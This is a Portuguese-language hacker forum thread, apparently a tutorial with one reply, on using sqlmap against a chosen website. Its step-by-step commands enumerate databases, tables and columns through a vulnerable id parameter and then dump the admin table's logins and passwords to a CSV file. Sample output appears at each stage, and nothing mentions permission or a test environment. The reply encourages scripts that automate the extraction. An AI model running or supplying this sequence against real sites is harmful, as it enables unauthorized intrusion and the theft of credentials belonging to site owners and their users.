Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Usando SQLMAP.py

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Usando SQLMAP.py

    O que é?

    Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.


    Para ver os comandos, basta digitar
    Código:
    python sqlmap.py -h
    Estudo

    Após você ter o site que deseja explorar, digite
    Código:
    python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs
    --dbs é para descobrir a(s) database(s) que contem no site


    O resultado será mais ou menos assim
    Código:
    [ * ] database_do_site
    [ * ] information_schema


    Após descobrir a(s) data base(s), digite
    Código:
    python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables
    --tables é para descobrir as tabelas que tem dentro da database


    O resultado será mais ou menos assim
    Código:
    +---------------+
    | admin		|
    | publicidade	|
    | teste		|
    +---------------+


    Após descobrir as tabelas, digite
    Código:
    python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns
    --columns é para descobrir as colunas que tem dentro da tabela escolhida


    O resultado será mais ou menos assim
    Código:
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | ID     | int(11)      |
    | login  | varchar(255) |
    | senha  | varchar(255) |
    +--------+--------------+


    Após descobrir as colunas, digite
    Código:
    python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,senha' --dump
    --dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna


    De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da pasta /pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv



    Agradecimentos:

    - n4sss
    - Cjota
    - Marcos nesster
    - Certinho
    chokao@yourSYSTEM:~# ./mass.sh

  • Font Size
    #2
    Muito bem amigo, ótimo tutorial, simples e prático.

    Veja este, um pouco mais completo, mostrando os exemplos e resultados que o sqlmap retorna.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Só uma dica: você pode fazer ferramentas que auxilia você a puxar as informações. No irc, alguns amigos tinham feito um em python, em que você configurava o que você queria que ele puxava, e o próprio script ia fazendo os comandos para você.

    Abraços
    Meu novo blog http://tecno-java.guiadohacker.com.br/

    Comment

    X
    Working...
    X